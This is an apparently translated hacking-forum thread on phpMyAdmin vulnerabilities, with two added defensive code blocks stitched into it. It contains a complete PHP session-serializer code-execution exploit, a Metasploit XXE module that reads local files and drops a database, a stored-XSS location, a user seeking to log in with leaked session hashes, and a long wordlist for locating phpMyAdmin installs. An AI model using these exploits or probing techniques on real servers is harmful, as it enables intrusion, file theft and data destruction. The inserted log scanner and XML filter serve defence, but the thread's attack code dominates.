[ phpMyAdmin vulnerability overview ]

Discussion in 'Web vulnerabilities' started by ettee, 7 Oct 2007.

  1. KIR@PRO

    Path disclosure in 3.* versions

    Tested on version 3.2.0.1
    Looks like they patched the XSS, but as usual they got something else instead, in our case path disclosure ;)
  2. Pashkela

    http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
     
    1 person likes this.
  3. абвгдешка

    phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit

    PHP:
       <?php
    /*
    phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit
    by M4g, ICQ 884888, http://snipper.ru, (c) 2011
    ---
    PHP depending and settings on the target PMA installation: magic_quotes_gpc = off, PHP <= 5.2.13 & PHP <= 5.3.2
    ---
    Links & Thanks:
    0. http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/
    1. http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html
    2. https://rdot.org/forum/showthread.php?t=286
    3. http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
    4. http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
    */

    /*Settings*/
    $pmaurl 'http://lamer/phpmyadmin325/'//full PMA url 
    $payload '<?php phpinfo(); ?>'//PHP code to execute
    /*Settings*/

    /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/

    $count_redirects 0;
    $max_redirects 5;

    //send HTTP data
    //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1
    function send_data($method$url$data ''$referer_string ''$cookie_string ''$ua_string 'Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8'$other_headers''$timeout 30$show 0$follow_redirect=0)
        {
        global 
    $count_redirects,$max_redirects;
        
    $return '';
        
    $feof_count 0;

        
    $parsed_url parse_url($url);
        
    $site $parsed_url['host'];
        
    $path $parsed_url['path'];
        
    $query $parsed_url['query'];

        if(
    preg_match('@_$@i',$query) && !preg_match('@_$@i',$url))
            
    $query rtrim($query,'_');

        if(
    preg_match('@_$@i',$path) && !preg_match('@_$@i',$url))
            
    $path rtrim($path,'_');

        (
    $method == 'GET' && !empty($data)) ? $path .= '?'.$data '';
        (
    $method == 'GET' && !empty($query) && empty($data)) ? $path .= '?'.$query '';
        (
    $method == 'POST' && !empty($query)) ? $path .= '?'.$query '';
     
        if(
    $fp fsockopen($site80$errno$errstr$timeout))
            {
            (
    $method == 'POST') ? $out "POST $path HTTP/1.1\r\n" $out "GET $path HTTP/1.1\r\n";
               
    $out .= "Host: $site\r\n";
              
    $out .= "Content-type: application/x-www-form-urlencoded\r\n";
                 
    $out .= "Connection: Close\r\n";
               
    $out .= "User-Agent: $ua_string\r\n";
               !empty(
    $referer_string) ? $out .= "Referer: $referer_string\r\n" '';
               !empty(
    $cookie_string) ? $out .= "Cookie: $cookie_string\r\n" '';
            !empty(
    $other_headers) ? $out .= $other_headers '';
            (
    $method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" $out .= "\r\n";
            (
    $method == 'POST') ? fwrite($fp$out.$data) : fwrite($fp$out);

            while (!
    feof($fp)) 
                {
                if(
    $feof_count >=10000)
                    break;
     
                
    $return .= fread($fp4800);
                ++
    $feof_count;
                }

            
    fclose($fp);

            if(
    $follow_redirect)
                {
                if(
    $count_redirects<$max_redirects)
                    {
                    if(
    preg_match('@Location: (.+)@i',$return,$redirect_match))
                        {
                        
    $count_redirects++;
                        
    $return send_data($method$redirect_match[1], $data$referer_string$cookie_string$ua_string$other_headers$timeout$show$follow_redirect);
                        
    $count_redirects 0;
                        }
                    }
                else
                    return 
    'Max redirects = '.$max_redirects;
                }

            if(
    $show == 1)
                {
                
    $return explode("\r\n\r\n",$return);
                
    $return $return[1];
                }
            elseif(
    $show == 2)
                {
                
    $return explode("\r\n\r\n",$return);
                
    $return $return[0];
                }

            return 
    $return;
            }
        else
            return array(
    'errno' => $errno'errstr' => $errstr);
            }

    $pmaurl rtrim($pmaurl,'/').'/index.php';

    //Regards to asddas
    $sess_path = array('/tmp/'
                       
    '/var/tmp/'
                       
    '/var/lib/php/'
                       
    '/var/lib/php4/'
                       
    '/var/lib/php5/'
                       
    '/var/lib/php/session/'
                       
    '/var/lib/php4/session/'
                       
    '/var/lib/php5/session/'
                       
    '/shared/sessions'
                       
    '/var/php_sessions/'
                       
    '/var/sessions/'
                       
    '/tmp/php_sessions/'
                       
    '/tmp/sessions/'
                       
    '../../../tmp/'
                       
    '../../../../tmp/',                                     
                       
    '../../../../../tmp/'
                       
    '../../../../../../tmp/'
                       
    '../../../../../../../tmp/'
                       
    '../../../temp/'
                       
    '../../../../temp/'
                       
    '../../../../../temp/'
                       
    '../../../../../../temp/'
                       
    '../../../../../../../temp/'
                       
    '../../../sessions/'
                       
    '../../../../sessions/'
                       
    '../../../../../sessions/'
                       
    '../../../../../../sessions/'
                       
    '../../../../../../../sessions/'
                       
    '../../../phptmp/'
                       
    '../../../../phptmp/'
                       
    '../../../../../phptmp/'
                       
    '../../../../../../phptmp/'
                       
    '../../../../../../../phptmp/');

    //1. Token, Session name and Cookies
    $token_page send_data('GET',$pmaurl);

    preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
     
    $token $token_array[1];
     
    preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
     
    $cookie_array $cookie_array[1];
    $cookie_array implode("; ",$cookie_array);

    preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array);

    $session $session_array[1];

    //2. Inject into session testing

    $sess_test_page '';
    $o 0;
    $good_inj false;

    do
        {
        
    $inj $sess_path[$o].'sess_'.$session;
        
    $query $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($inj).':"'.$inj.'";}}');
        
    $sess_test_page send_data('GET',$query,'',$pmaurl,$cookie_array);
        
    $sess_test_page2 send_data('GET',$pmaurl.'?token='.$token,'',$pmaurl,$cookie_array);

        if(
    stristr($sess_test_page2,'PMA_Config'))
            {
            
    $good_inj $inj;
            
    flush();
            print 
    '[+] '.$inj.' - good path<br/>';
            break;
            }
        else
            {
            
    flush();
            print 
    '[-] '.$inj.' - bad path<br/>';
            }
        
    $o++;
        }
    while(
    $o count($sess_path));

    if(
    $good_inj)
        {
        
    $query $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($good_inj).':"'.$good_inj.'";}}').'&_SESSION[payload]='.urlencode($payload);
        
    $sess_test_page send_data('GET',$query,'',$pmaurl,$cookie_array);
        
    $sess_test_page2 send_data('GET',$pmaurl.'?token='.$token,'',$pmaurl,$cookie_array);
        
        print 
    $sess_test_page2;
        }
    else
        die(
    '[+] Session path was not found');
     
    #23 абвгдешка, 12 Jul 2011
    Last edited: 14 Jul 2011
    3 people like this.
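
Seen from the defender's side, the requests the script above sends are distinctive: a query parameter whose name starts with `_SESSION[`, sent together with `session_to_unset`, and a serialized PHP object in the value. The following added example (not part of the original post; the log lines are constructed and the function names are hypothetical) flags such requests in a web server access log, and generalizes the first indicator to any PHP superglobal name used as a request parameter.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format (not taken from the page).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jul/2011:10:00:01 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jul/2011:10:00:02 +0000] "GET /phpmyadmin/index.php?session_to_unset=123'
    '&token=0123456789abcdef0123456789abcdef'
    '&_SESSION%5B%21bla%5D=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7B%7D%7D'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jul/2011:10:05:00 +0000] "GET /phpmyadmin/index.php?db=shop'
    '&token=0123456789abcdef0123456789abcdef HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jul/2011:10:06:00 +0000] "GET /index.php?_SESSION[user]=admin HTTP/1.1" 404 210 "-" "curl/7.21"',
]

# Client address and request target from one access-log line.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A request parameter named like a PHP superglobal array is never legitimate input.
SUPERGLOBAL_RE = re.compile(
    r'^(?:_(?:SESSION|GET|POST|COOKIE|SERVER|ENV|FILES|REQUEST)|GLOBALS)\['
)

# Serialized PHP object header, e.g. O:10:"ClassName":1:{
SERIALIZED_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z_][A-Za-z0-9_]*":\d+:\{')


def indicators_for(target):
    """Return the sorted indicator names found in one request target."""
    _path, _, query = target.partition("?")
    found = set()
    # parse_qsl percent-decodes names and values, so %5B / %5D are seen as [ ].
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            found.add("superglobal_param")
        if name == "session_to_unset":
            found.add("session_to_unset")
        if SERIALIZED_OBJECT_RE.search(value):
            found.add("serialized_object")
    return sorted(found)


def scan(lines):
    """Return one record per log line that carries at least one indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line
        found = indicators_for(match.group("target"))
        if found:
            hits.append({
                "line": number,
                "client": match.group("client"),
                "path": match.group("target").partition("?")[0],
                "indicators": found,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["line"], hit["client"], hit["path"], ",".join(hit["indicators"]))
```

A line carrying all three indicators matches the request shape in the post; `superglobal_param` on its own is still worth alerting on for any PHP application.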
  4. Ereee

    phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
    Code:
    require 'msf/core'
     
    class Metasploit3 < Msf::Auxiliary
     
        include Msf::Exploit::Remote::HttpClient
     
        def initialize
            super(
                'Name'        => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
                'Version'     => '1.0',
                'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
                The attacker must be logged in to MySQL via phpMyAdmin.
                Works on Windows and Linux Versions 3.3.X and 3.4.X},
                'References'  =>
                    [
                        [ 'CVE', '2011-4107' ],
                                            [ 'OSVDB', '76798' ],
                                            [ 'BID', '50497' ],
                                            [ 'URL', 'http://secforce.com/research/'],
                    ],
                'Author'      => [ 'Marco Batista' ],
                'License'     => MSF_LICENSE
                )
     
            register_options(
                [
                    Opt::RPORT(80),
                    OptString.new('FILE', [ true,  "File to read", '/etc/passwd']),
                    OptString.new('USER', [ true,  "Username", 'root']),
                    OptString.new('PASS', [ false,  "Password", 'password']),
                    OptString.new('DB', [ true,  "Database to use/create", 'hddaccess']),
                    OptString.new('TBL', [ true,  "Table to use/create and read the file to", 'files']),
                    OptString.new('APP', [ true,  "Location for phpMyAdmin URL", '/phpmyadmin']),
                    OptString.new('DROP', [ true,  "Drop database after reading file?", 'true']),
                ],self.class)
        end
     
        def loginprocess
            # HTTP GET TO GET SESSION VALUES
            getresponse = send_request_cgi({
                'uri'     => datastore['APP']+'/index.php',
                'method'  => 'GET',
                'version' => '1.1',
                }, 25)
     
            if (getresponse.nil?)
                print_error("no response for #{ip}:#{rport}")
            elsif (getresponse.code == 200)
                print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
            elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
                print_status("Received 302 to #{getresponse.headers['Location']}")
            else
                print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
            end
     
            valuesget = getresponse.headers["Set-Cookie"]
            varsget = valuesget.split(" ")
     
            #GETTING THE VARIABLES NEEDED
            phpMyAdmin = varsget.grep(/phpMyAdmin/).last
            pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
            # END HTTP GET
     
            # LOGIN POST REQUEST TO GET COOKIE VALUE
            postresponse = send_request_cgi({
                'uri'     => datastore['APP']+'/index.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Content-Type' => 'application/x-www-form-urlencoded',
                        'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
                                },
                'data'    => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
                }, 25)     
     
            if (postresponse["Location"].nil?)
                print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
                tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last          
            else
                tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
            end
             
             
            valuespost = postresponse.headers["Set-Cookie"]
            varspost = valuespost.split(" ")
             
            #GETTING THE VARIABLES NEEDED
            pmaUser = varspost.grep(/pmaUser-1/).last
            pmaPass = varspost.grep(/pmaPass-1/).last
     
            return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
            # END OF LOGIN POST REQUEST
            rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
                print_error(e.message)
            rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
                print_error(e.message)
        end
     
        def readfile(cookie,tokenvalue)
            #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
            getfiles = send_request_cgi({
                'uri'     => datastore['APP']+'/export.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Cookie' => cookie
                            },
                'data'    => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
                }, 25)
             
            if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
                print_error("Error reading the file... not enough privilege? login error?")        
            else
                print_status("#{getfiles.body}")
            end
        end
     
     
        def dropdatabase(cookie,tokenvalue)
            dropdb = send_request_cgi({
                'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
                'method'  => 'GET',
                'version' => '1.1',
                'headers' =>{
                        'Cookie' => cookie
                            },
                }, 25)
     
                print_status("Dropping database: "+datastore['DB'])
        end
     
        def run
            cookie,tokenvalue = loginprocess()
         
            print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")
         
            craftedXML =  "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
            craftedXML << tokenvalue+"\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
            craftedXML << "server\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
            craftedXML << "Content-Type: text/xml\n\n"
            craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
            craftedXML << "<!DOCTYPE ficheiro [  \n"
            craftedXML << "  <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
            craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
            craftedXML << "    <pma:structure_schemas>\n"
            craftedXML << "        <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
            craftedXML << "            <pma:table name=\""+datastore['TBL']+"\">\n"
            craftedXML << "                CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
            craftedXML << "            </pma:table>\n"
            craftedXML << "        </pma:database>\n"
            craftedXML << "    </pma:structure_schemas>\n"
            craftedXML << "    <database name=\""+datastore['DB']+"\">\n"
            craftedXML << "        <table name=\""+datastore['TBL']+"\">\n"
            craftedXML << "            <column name=\"file\">&conteudo;</column>\n"
            craftedXML << "        </table>\n"
            craftedXML << "    </database>\n"
            craftedXML << "</pma_xml_export>\n\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
            craftedXML << "xml\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
            craftedXML << ",\n\n"
            craftedXML << "------WebKitFormBoundary3XPL01T--"
             
         
            print_status("Grabbing that #{datastore['FILE']} you want...")
            res = send_request_cgi({
                'uri'     => datastore['APP']+'/import.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
                        'Cookie' => cookie
                            },
                'data'    => craftedXML
            }, 25)
     
            readfile(cookie,tokenvalue)
     
            if (datastore['DROP'] == "true")
                dropdatabase(cookie,tokenvalue)
            else
                print_status("Database was not dropped: "+datastore['DB'])         
            end
     
        end
    end
    http://1337day.com/exploits/17376


    P.S. Date: 12-01-2012 ;)
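
The module above relies on the XML import accepting a document whose DOCTYPE declares an external entity. As an added example, not part of the original post or of phpMyAdmin, this pre-filter rejects such uploads before they reach an importer; it assumes legitimate import files never carry a DTD, and the function name and sample documents are constructed.

```python
import xml.parsers.expat

# Constructed sample: an import file whose DOCTYPE declares an external entity.
SAMPLE_WITH_ENTITY = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE doc [
  <!ENTITY ext SYSTEM "file:///constructed/path">
]>
<pma_xml_export version="1.0">
  <database name="d"><table name="t"><column name="file">&ext;</column></table></database>
</pma_xml_export>
"""

# Constructed sample: the same structure without any DTD.
SAMPLE_CLEAN = b"""<?xml version="1.0" encoding="utf-8"?>
<pma_xml_export version="1.0">
  <database name="d"><table name="t"><column name="file">plain text</column></table></database>
</pma_xml_export>
"""


def inspect_xml_import(data):
    """Inspect an uploaded XML document without resolving any entity.

    No ExternalEntityRefHandler is installed, so expat only reports the
    declarations and never opens the referenced resource.
    """
    report = {
        "doctype": False,
        "external_entities": [],   # (entity name, system identifier)
        "internal_entities": [],   # entity names declared with a literal value
        "error": None,
    }
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True
        if system_id is not None or public_id is not None:
            # External DTD subset: also a remote/local fetch on a resolving parser.
            report["external_entities"].append(("<external DTD>", system_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            report["external_entities"].append((name, system_id))
        else:
            report["internal_entities"].append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        # Malformed input is rejected as well; a lenient importer might
        # otherwise interpret it differently from this check.
        report["error"] = str(exc)

    # Policy (assumption): import files need no DTD at all, so any DOCTYPE fails.
    report["accept"] = not report["doctype"] and report["error"] is None
    return report


if __name__ == "__main__":
    for label, doc in (("with entity", SAMPLE_WITH_ENTITY), ("clean", SAMPLE_CLEAN)):
        print(label, inspect_xml_import(doc))
```

The filter is a second layer only: the importer's own XML parser should also be configured not to load external entities.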
     
  5. Strikerus

    People often don't delete the documentation, and they should. The version can be determined that way too ;)
    .../phpmyadmin/Documentation.html
     
    #25 Strikerus, 15 Apr 2012
    Last edited: 15 Apr 2012
  6. dynda2000

    Please explain how and with what to run this exploit?
     
  7. ex'pert

    Guys, can you tell me what can be done with this
    Code:
    <a title="Все статьи" href="site.com/articles/?phpMyAdmin=c08d2be2e14cc3df4f21ae0b8cc7dc6a&phpMyAdmin=e82e404ad3bd12018999ec4ba6d1ab98">go all materials</a>
    On one of the sites the admin apparently left this link by accident. What is in these hashes?
     
  8. BigBear

    Nothing significant, it seems, two MD5 hashes (if I'm not mistaken).
  9. ex'pert

    Well, I don't understand why there are 2 of them. Maybe one of them contains the password to phpMyAdmin? I know the login address and that user's login. It would be nice to decrypt the hashes, if only I knew whether the password is in them?
    Or to log in somehow using these hashes or cookies
     
  10. MrCepbIu

    What should be put in $sess_path for Windows?
     
    #30 MrCepbIu, 13 Sep 2012
    Last edited: 13 Sep 2012
  11. FlooP1k

    Are there any other ways to find out the full path in phpMyAdmin? It's just that all the methods listed in the first post are very old and no longer relevant ( At least if the user has full privileges?
     
  12. ReVOLVeR

    phpMyAdmin stored XSS

    tested on: phpMyAdmin 3.4.*
    script: /setup/index.php
    path: index.php?page=servers&mode=edit&id=1
    vulnerable field: Server hostname

    Found it just now, haven't checked whether it's already on the internet.
     
    Filipp likes this.
  13. zuzzz

    Recently made myself a little wordlist for searching. Maybe someone will find it useful.
    Code:
    /_phpMyAdmin/
    /admin/
    /admin/mysql/
    /admin/phpmyadmin/
    /admin/pma/
    /db/
    /dbadmin/
    /myadmin/
    /mysql-admin/
    /mysql/
    /mysqladmin/
    /mysqlmanager/
    /p/m/a/
    /php-my-admin/
    /php-myadmin/
    /phpm/
    /phpmanager/
    /phpmy-admin/
    /phpmy/
    /phpMyA/
    /phpmyad-sys/
    /phpmyad/
    /phpMyAdmin/
    /phpMyAdmin-1.1.0/
    /phpMyAdmin-1.3.0/
    /phpMyAdmin-2.0.5/
    /phpMyAdmin-2.1.0/
    /phpMyAdmin-2.10.0-rc1/
    /phpMyAdmin-2.10.0.1/
    /phpMyAdmin-2.10.0.2/
    /phpMyAdmin-2.10.0/
    /phpMyAdmin-2.10.1-rc1/
    /phpMyAdmin-2.10.1/
    /phpMyAdmin-2.10.2/
    /phpMyAdmin-2.10.3-rc1/
    /phpMyAdmin-2.10.3/
    /phpMyAdmin-2.11.0-rc2/
    /phpMyAdmin-2.11.0/
    /phpMyAdmin-2.11.1-rc1/
    /phpMyAdmin-2.11.1.1/
    /phpMyAdmin-2.11.1.2/
    /phpMyAdmin-2.11.1/
    /phpMyAdmin-2.11.10.1/
    /phpMyAdmin-2.11.10/
    /phpMyAdmin-2.11.11-rc1/
    /phpMyAdmin-2.11.11.1/
    /phpMyAdmin-2.11.11.2/
    /phpMyAdmin-2.11.11.3/
    /phpMyAdmin-2.11.11/
    /phpMyAdmin-2.11.2-rc1/
    /phpMyAdmin-2.11.2.1/
    /phpMyAdmin-2.11.2.2/
    /phpMyAdmin-2.11.2/
    /phpMyAdmin-2.11.3-rc1/
    /phpMyAdmin-2.11.3/
    /phpMyAdmin-2.11.4-rc1/
    /phpMyAdmin-2.11.4/
    /phpMyAdmin-2.11.5-rc1/
    /phpMyAdmin-2.11.5.1/
    /phpMyAdmin-2.11.5.2/
    /phpMyAdmin-2.11.5/
    /phpMyAdmin-2.11.6-rc1/
    /phpMyAdmin-2.11.6/
    /phpMyAdmin-2.11.7-rc1/
    /phpMyAdmin-2.11.7-rc2/
    /phpMyAdmin-2.11.7.1/
    /phpMyAdmin-2.11.7/
    /phpMyAdmin-2.11.8-rc1/
    /phpMyAdmin-2.11.8.1/
    /phpMyAdmin-2.11.8/
    /phpMyAdmin-2.11.9.1/
    /phpMyAdmin-2.11.9.2/
    /phpMyAdmin-2.11.9.3/
    /phpMyAdmin-2.11.9.4/
    /phpMyAdmin-2.11.9.5/
    /phpMyAdmin-2.11.9.6/
    /phpMyAdmin-2.11.9/
    /phpMyAdmin-2.2.0/
    /phpMyAdmin-2.2.1/
    /phpMyAdmin-2.2.2/
    /phpMyAdmin-2.2.3/
    /phpMyAdmin-2.2.4/
    /phpMyAdmin-2.2.5/
    /phpMyAdmin-2.2.6/
    /phpMyAdmin-2.2.7-pl1/
    /phpMyAdmin-2.3.0/
    /phpMyAdmin-2.3.1/
    /phpMyAdmin-2.3.2/
    /phpMyAdmin-2.3.3-pl1/
    /phpMyAdmin-2.4.0/
    /phpMyAdmin-2.5.0/
    /phpMyAdmin-2.5.1/
    /phpMyAdmin-2.5.2/
    /phpMyAdmin-2.5.4/
    /phpMyAdmin-2.5.5-pl1/
    /phpMyAdmin-2.5.5-rc1/
    /phpMyAdmin-2.5.5-rc2/
    /phpMyAdmin-2.5.6-rc1/
    /phpMyAdmin-2.5.6-rc2/
    /phpMyAdmin-2.5.6/
    /phpMyAdmin-2.5.7-pl1/
    /phpMyAdmin-2.6.0-alpha/
    /phpMyAdmin-2.6.0-alpha2/
    /phpMyAdmin-2.6.0-beta1/
    /phpMyAdmin-2.6.0-beta2/
    /phpMyAdmin-2.6.0-pl1/
    /phpMyAdmin-2.6.0-pl2/
    /phpMyAdmin-2.6.0-pl3/
    /phpMyAdmin-2.6.0-rc1/
    /phpMyAdmin-2.6.0-rc2/
    /phpMyAdmin-2.6.0-rc3/
    /phpMyAdmin-2.6.0/
    /phpMyAdmin-2.6.1-pl1/
    /phpMyAdmin-2.6.1-pl2/
    /phpMyAdmin-2.6.1-pl3/
    /phpMyAdmin-2.6.1-rc1/
    /phpMyAdmin-2.6.1-rc2/
    /phpMyAdmin-2.6.1/
    /phpMyAdmin-2.6.2-beta1/
    /phpMyAdmin-2.6.2-pl1/
    /phpMyAdmin-2.6.2-rc1/
    /phpMyAdmin-2.6.3-pl1/
    /phpMyAdmin-2.6.3-rc1/
    /phpMyAdmin-2.6.3/
    /phpMyAdmin-2.6.4-pl1/
    /phpMyAdmin-2.6.4-pl2/
    /phpMyAdmin-2.6.4-pl3/
    /phpMyAdmin-2.6.4-pl4/
    /phpMyAdmin-2.6.4-rc1/
    /phpMyAdmin-2.7.0-beta1/
    /phpMyAdmin-2.7.0-pl1/
    /phpMyAdmin-2.7.0-pl2/
    /phpMyAdmin-2.7.0-rc1/
    /phpMyAdmin-2.8.0-beta1/
    /phpMyAdmin-2.8.0-rc1/
    /phpMyAdmin-2.8.0-rc2/
    /phpMyAdmin-2.8.0.1/
    /phpMyAdmin-2.8.0.2/
    /phpMyAdmin-2.8.0.3/
    /phpMyAdmin-2.8.0.4/
    /phpMyAdmin-2.8.0/
    /phpMyAdmin-2.8.1-rc1/
    /phpMyAdmin-2.8.1/
    /phpMyAdmin-2.8.2.4/
    /phpMyAdmin-2.9.0.1/
    /phpMyAdmin-2.9.0.2/
    /phpMyAdmin-2.9.0/
    /phpMyAdmin-2.9.1.1/
    /phpMyAdmin-2.9.2-rc1/
    /phpMyAdmin-2.9.2/
    /phpMyAdmin-2/
    /phpMyAdmin-3.0.0-alpha/
    /phpMyAdmin-3.0.0-rc2/
    /phpMyAdmin-3.0.0/
    /phpMyAdmin-3.0.1-rc1/
    /phpMyAdmin-3.0.1.1/
    /phpMyAdmin-3.0.1/
    /phpMyAdmin-3.1.0-beta1/
    /phpMyAdmin-3.1.0-rc1/
    /phpMyAdmin-3.1.0/
    /phpMyAdmin-3.1.1/
    /phpMyAdmin-3.1.2-rc1/
    /phpMyAdmin-3.1.2/
    /phpMyAdmin-3.1.3-rc1/
    /phpMyAdmin-3.1.3.1/
    /phpMyAdmin-3.1.3.2/
    /phpMyAdmin-3.1.3/
    /phpMyAdmin-3.1.4-rc1/
    /phpMyAdmin-3.1.4-rc2/
    /phpMyAdmin-3.1.4/
    /phpMyAdmin-3.1.5-rc1/
    /phpMyAdmin-3.1.5/
    /phpMyAdmin-3.2.0-beta1/
    /phpMyAdmin-3.2.0-rc1/
    /phpMyAdmin-3.2.0.1/
    /phpMyAdmin-3.2.0/
    /phpMyAdmin-3.2.1/
    /phpMyAdmin-3.2.2-rc1/
    /phpMyAdmin-3.2.2.1/
    /phpMyAdmin-3.2.2/
    /phpMyAdmin-3.2.3-rc1/
    /phpMyAdmin-3.2.3/
    /phpMyAdmin-3.2.4-rc1/
    /phpMyAdmin-3.2.4/
    /phpMyAdmin-3.2.5-rc1/
    /phpMyAdmin-3.2.5-rc2/
    /phpMyAdmin-3.2.5/
    /phpMyAdmin-3.3.0-alpha1/
    /phpMyAdmin-3.3.0-beta1/
    /phpMyAdmin-3.3.0-rc1/
    /phpMyAdmin-3.3.0-rc2/
    /phpMyAdmin-3.3.0-rc3/
    /phpMyAdmin-3.3.0/
    /phpMyAdmin-3.3.1-rc1/
    /phpMyAdmin-3.3.1/
    /phpMyAdmin-3.3.10-rc1/
    /phpMyAdmin-3.3.10.1/
    /phpMyAdmin-3.3.10.2/
    /phpMyAdmin-3.3.10.3/
    /phpMyAdmin-3.3.10.4/
    /phpMyAdmin-3.3.10.5/
    /phpMyAdmin-3.3.10/
    /phpMyAdmin-3.3.2-rc1/
    /phpMyAdmin-3.3.2/
    /phpMyAdmin-3.3.3-rc1/
    /phpMyAdmin-3.3.3/
    /phpMyAdmin-3.3.4-rc1/
    /phpMyAdmin-3.3.4/
    /phpMyAdmin-3.3.5-rc1/
    /phpMyAdmin-3.3.5.1/
    /phpMyAdmin-3.3.5/
    /phpMyAdmin-3.3.6-rc1/
    /phpMyAdmin-3.3.6/
    /phpMyAdmin-3.3.7-7/
    /phpMyAdmin-3.3.7-rc1/
    /phpMyAdmin-3.3.7/
    /phpMyAdmin-3.3.8-rc1/
